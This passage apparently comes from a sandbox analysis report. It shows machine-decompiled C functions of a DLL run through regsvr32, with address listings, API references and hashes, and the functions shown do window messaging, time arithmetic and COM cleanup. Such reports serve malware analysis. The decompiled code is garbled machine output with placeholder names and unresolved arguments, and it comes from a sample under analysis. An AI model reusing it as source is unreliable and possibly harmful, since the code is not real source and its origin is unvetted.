									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                                                            0x100134e7
                                                                                                            0x100134ee
                                                                                                            0x100134f1
                                                                                                            0x100134f4
                                                                                                            0x100134f8
                                                                                                            0x100134fa
                                                                                                            0x100136ef
                                                                                                            0x100136ef
                                                                                                            0x100136ef
                                                                                                            0x00000000
                                                                                                            0x1001350a
                                                                                                            0x1001350a
                                                                                                            0x10013510
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013516
                                                                                                            0x10013520
                                                                                                            0x10013520
                                                                                                            0x10013521
                                                                                                            0x10013526
                                                                                                            0x10013529
                                                                                                            0x1001352b
                                                                                                            0x1001352d
                                                                                                            0x10013595
                                                                                                            0x1001359a
                                                                                                            0x100135a1
                                                                                                            0x100135a3
                                                                                                            0x100135de
                                                                                                            0x100135e0
                                                                                                            0x100135e3
                                                                                                            0x100135e8
                                                                                                            0x100135ea
                                                                                                            0x100135eb
                                                                                                            0x100135eb
                                                                                                            0x100135ed
                                                                                                            0x100135ef
                                                                                                            0x100135f2
                                                                                                            0x100135f5
                                                                                                            0x100135fa
                                                                                                            0x100135ff
                                                                                                            0x10013601
                                                                                                            0x10013603
                                                                                                            0x10013608
                                                                                                            0x1001360a
                                                                                                            0x1001360e
                                                                                                            0x1001360e
                                                                                                            0x1001361b
                                                                                                            0x10013627
                                                                                                            0x1001362b
                                                                                                            0x10013631
                                                                                                            0x10013634
                                                                                                            0x10013637
                                                                                                            0x1001363c
                                                                                                            0x1001363e
                                                                                                            0x10013641
                                                                                                            0x10013646
                                                                                                            0x10013649
                                                                                                            0x1001364d
                                                                                                            0x1001364d
                                                                                                            0x1001365a
                                                                                                            0x10013666
                                                                                                            0x1001366a
                                                                                                            0x10013670
                                                                                                            0x10013673
                                                                                                            0x10013676
                                                                                                            0x1001367b
                                                                                                            0x1001367d
                                                                                                            0x10013680
                                                                                                            0x10013685
                                                                                                            0x10013688
                                                                                                            0x1001368c
                                                                                                            0x1001368c
                                                                                                            0x10013699
                                                                                                            0x1001369e
                                                                                                            0x100136a0
                                                                                                            0x100136a3
                                                                                                            0x100136a6
                                                                                                            0x00000000
                                                                                                            0x100136a8
                                                                                                            0x100136a8
                                                                                                            0x100136ae
                                                                                                            0x100136b5
                                                                                                            0x100136b8
                                                                                                            0x100136bb
                                                                                                            0x100136c1
                                                                                                            0x100136c4
                                                                                                            0x100136c7
                                                                                                            0x100136c9
                                                                                                            0x100136e7
                                                                                                            0x100136e7
                                                                                                            0x100136e7
                                                                                                            0x100136cb
                                                                                                            0x100136ce
                                                                                                            0x100136d1
                                                                                                            0x100136d4
                                                                                                            0x100136db
                                                                                                            0x100136db
                                                                                                            0x00000000
                                                                                                            0x100136c9
                                                                                                            0x100136aa
                                                                                                            0x100136ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100136ac
                                                                                                            0x100136a6
                                                                                                            0x100135a5
                                                                                                            0x100135a6
                                                                                                            0x100135ab
                                                                                                            0x100135ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100135b0
                                                                                                            0x100135b6
                                                                                                            0x100135bd
                                                                                                            0x100135c4
                                                                                                            0x100135c7
                                                                                                            0x100135c9
                                                                                                            0x100135cc
                                                                                                            0x100135cf
                                                                                                            0x100135d6
                                                                                                            0x100135d9
                                                                                                            0x00000000
                                                                                                            0x10013539
                                                                                                            0x10013539
                                                                                                            0x1001353e
                                                                                                            0x10013544
                                                                                                            0x10013547
                                                                                                            0x1001354a
                                                                                                            0x1001354d
                                                                                                            0x10013552
                                                                                                            0x10013559
                                                                                                            0x1001355b
                                                                                                            0x10013561
                                                                                                            0x1001356a
                                                                                                            0x10013570
                                                                                                            0x10013575
                                                                                                            0x10013576
                                                                                                            0x1001357d
                                                                                                            0x10013585
                                                                                                            0x10013588
                                                                                                            0x10013588
                                                                                                            0x1001356a
                                                                                                            0x100136ea
                                                                                                            0x100136ea
                                                                                                            0x100136f1
                                                                                                            0x100136f4
                                                                                                            0x100136f4
                                                                                                            0x1001352d
                                                                                                            0x10013518
                                                                                                            0x1001351a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001351a

                                                                                                            APIs
                                                                                                              • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __allrem.LIBCMT ref: 100135FA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                                                            • __allrem.LIBCMT ref: 10013637
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                                                            • __allrem.LIBCMT ref: 10013676
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                                                              • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282128132-0
                                                                                                            • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                                                            • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F210 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1000F210(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011BF0(0x1003b066, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t104 = _t73 + _t73 * 4 << 3;
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10011C50(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E10010592(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010578(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x10043098);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}



















                                                                                                            0x1000f210
                                                                                                            0x1000f215
                                                                                                            0x1000f21a
                                                                                                            0x1000f21d
                                                                                                            0x1000f220
                                                                                                            0x1000f225
                                                                                                            0x1000f22c
                                                                                                            0x1000f22f
                                                                                                            0x1000f232
                                                                                                            0x1000f39d
                                                                                                            0x1000f39d
                                                                                                            0x1000f3a7
                                                                                                            0x1000f3af
                                                                                                            0x1000f3af
                                                                                                            0x1000f23a
                                                                                                            0x1000f240
                                                                                                            0x1000f243
                                                                                                            0x1000f249
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f24f
                                                                                                            0x1000f254
                                                                                                            0x1000f257
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f263
                                                                                                            0x1000f266
                                                                                                            0x1000f276
                                                                                                            0x1000f280
                                                                                                            0x1000f287
                                                                                                            0x1000f28c
                                                                                                            0x1000f293
                                                                                                            0x1000f298
                                                                                                            0x1000f29c
                                                                                                            0x1000f2a0
                                                                                                            0x1000f2d5
                                                                                                            0x1000f2d5
                                                                                                            0x1000f2a2
                                                                                                            0x1000f2ad
                                                                                                            0x1000f2b6
                                                                                                            0x1000f2ba
                                                                                                            0x1000f2c3
                                                                                                            0x1000f2c7
                                                                                                            0x1000f2cd
                                                                                                            0x1000f2cd
                                                                                                            0x1000f2d8
                                                                                                            0x1000f2de
                                                                                                            0x1000f2e4
                                                                                                            0x1000f2e7
                                                                                                            0x1000f2ea
                                                                                                            0x1000f2f0
                                                                                                            0x1000f2f5
                                                                                                            0x1000f2f9
                                                                                                            0x1000f2fc
                                                                                                            0x1000f2fd
                                                                                                            0x1000f302
                                                                                                            0x1000f307
                                                                                                            0x1000f309
                                                                                                            0x1000f318
                                                                                                            0x1000f32c
                                                                                                            0x1000f32f
                                                                                                            0x1000f335
                                                                                                            0x1000f338
                                                                                                            0x1000f343
                                                                                                            0x1000f348
                                                                                                            0x1000f348
                                                                                                            0x1000f352
                                                                                                            0x1000f357
                                                                                                            0x1000f357
                                                                                                            0x1000f361
                                                                                                            0x1000f366
                                                                                                            0x1000f366
                                                                                                            0x1000f36c
                                                                                                            0x1000f36f
                                                                                                            0x1000f36f
                                                                                                            0x1000f307
                                                                                                            0x1000f373
                                                                                                            0x1000f37b
                                                                                                            0x1000f381
                                                                                                            0x1000f38b
                                                                                                            0x1000f38e
                                                                                                            0x1000f38e
                                                                                                            0x1000f392
                                                                                                            0x1000f392
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000F215
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                                                              • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                              • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098219910-0
                                                                                                            • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                                                            • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0xf3933a06
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}
















                                                                                                            0x1002b9fe
                                                                                                            0x1002ba05
                                                                                                            0x1002ba0a
                                                                                                            0x1002ba0b
                                                                                                            0x1002ba0e
                                                                                                            0x1002ba13
                                                                                                            0x1002ba1a
                                                                                                            0x1002ba20
                                                                                                            0x1002ba23
                                                                                                            0x1002ba30
                                                                                                            0x1002ba33
                                                                                                            0x1002ba36
                                                                                                            0x1002ba39
                                                                                                            0x1002ba46
                                                                                                            0x1002ba5d
                                                                                                            0x1002ba60
                                                                                                            0x1002ba72
                                                                                                            0x1002ba91
                                                                                                            0x1002ba94
                                                                                                            0x1002baa4
                                                                                                            0x1002bab2
                                                                                                            0x1002babc
                                                                                                            0x1002babe
                                                                                                            0x1002bace
                                                                                                            0x1002bae1
                                                                                                            0x1002bae6
                                                                                                            0x1002baf1
                                                                                                            0x1002bb20
                                                                                                            0x1002bb22
                                                                                                            0x00000000
                                                                                                            0x1002bafe
                                                                                                            0x1002bb03
                                                                                                            0x1002bb04
                                                                                                            0x1002bb09
                                                                                                            0x1002bb16
                                                                                                            0x1002bb18
                                                                                                            0x1002bb1d
                                                                                                            0x1002bb23
                                                                                                            0x1002bb26
                                                                                                            0x1002bb26
                                                                                                            0x1002bb16
                                                                                                            0x1002bb2c
                                                                                                            0x1002bb38

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32 ref: 1002BA88
                                                                                                            • SendMessageA.USER32 ref: 1002BA94
                                                                                                            • SendMessageA.USER32 ref: 1002BAA4
                                                                                                            • SendMessageA.USER32 ref: 1002BAB2
                                                                                                            • SendMessageA.USER32 ref: 1002BABC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 74886174-0
                                                                                                            • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                                                            • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}




















                                                                                                            0x10030a77
                                                                                                            0x10030a86
                                                                                                            0x10030a8c
                                                                                                            0x10030b66
                                                                                                            0x00000000
                                                                                                            0x10030b66
                                                                                                            0x10030a9f
                                                                                                            0x10030aaf
                                                                                                            0x10030b5f
                                                                                                            0x10030b61
                                                                                                            0x00000000
                                                                                                            0x10030ab5
                                                                                                            0x10030ab7
                                                                                                            0x10030acf
                                                                                                            0x10030ad4
                                                                                                            0x10030b34
                                                                                                            0x10030b3a
                                                                                                            0x10030b43
                                                                                                            0x10030b43
                                                                                                            0x10030b48
                                                                                                            0x10030b4c
                                                                                                            0x10030b4e
                                                                                                            0x10030b51
                                                                                                            0x10030b56
                                                                                                            0x10030b59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030b59
                                                                                                            0x00000000
                                                                                                            0x10030b4c
                                                                                                            0x10030ad6
                                                                                                            0x10030ad7
                                                                                                            0x10030b1f
                                                                                                            0x10030b25
                                                                                                            0x10030b2d
                                                                                                            0x10030b2d
                                                                                                            0x00000000
                                                                                                            0x10030b25
                                                                                                            0x10030ad9
                                                                                                            0x10030ade
                                                                                                            0x10030af8
                                                                                                            0x10030afb
                                                                                                            0x10030afe
                                                                                                            0x10030b04
                                                                                                            0x10030b05
                                                                                                            0x10030b06
                                                                                                            0x10030b08
                                                                                                            0x10030b0a
                                                                                                            0x10030b0d
                                                                                                            0x10030b0f
                                                                                                            0x10030b18
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x00000000
                                                                                                            0x10030b0f
                                                                                                            0x10030ae1
                                                                                                            0x10030ae2
                                                                                                            0x10030b77
                                                                                                            0x10030b7d
                                                                                                            0x10030b7f
                                                                                                            0x10030b88
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x00000000
                                                                                                            0x10030b8f
                                                                                                            0x10030aea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x10030b6d
                                                                                                            0x10030b70
                                                                                                            0x00000000
                                                                                                            0x10030b70

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Capture$Message$Dispatch
                                                                                                            • String ID:
                                                                                                            • API String ID: 3654672037-0
